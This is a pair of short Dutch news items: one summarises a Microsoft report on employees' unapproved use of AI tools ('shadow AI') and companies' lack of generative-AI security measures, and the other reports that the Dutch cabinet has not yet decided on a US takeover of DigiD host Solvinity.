'Schaduw-AI' verwijst naar het gebruik van kunstmatige intelligentie door medewerkers zonder dat de IT- of beveiligingsafdeling hiervan op de hoogte is of hiervoor toestemming heeft gegeven. Het rapport van Microsoft waarschuwt voor een groeiende kloof tussen innovatie en veiligheid. Terwijl het gebruik van AI explosief groeit, beschikt nog geen helft van de bedrijven (47 procent) over specifieke veiligheidsmaatregelen voor generatieve AI. Ongeveer 29 procent van de werknemers gebruikt al niet-goedgekeurde AI-agenten voor hun werk, wat volgens Microsoft blinde vlekken creëert in de bedrijfsveiligheid.

Bron: Microsoft

Het demissionair kabinet heeft nog geen besluit genomen over de voorgenomen overname van DigiD-beheerder Solvinity door een Amerikaanse partij. Vrijwel alle partijen in de Tweede Kamer zijn tegen de overname, uit vrees voor Amerikaanse bemoeienis met de Nederlandse digitale infrastructuur. Het kabinet wil eerst lopende onderzoeken naar de overname afronden voordat er een beslissing wordt genomen. De Tweede Kamer heeft herhaaldelijk haar zorgen geuit over de mogelijke risico's voor de nationale veiligheid en de privacy van burgers indien een buitenlandse partij controle krijgt over een cruciale dienst als DigiD. De dienst wordt door miljoenen Nederlanders gebruikt voor toegang tot overheidsdiensten en andere online platformen. Het is nog onduidelijk wanneer het kabinet een definitief besluit zal nemen.

Bron: NU.nl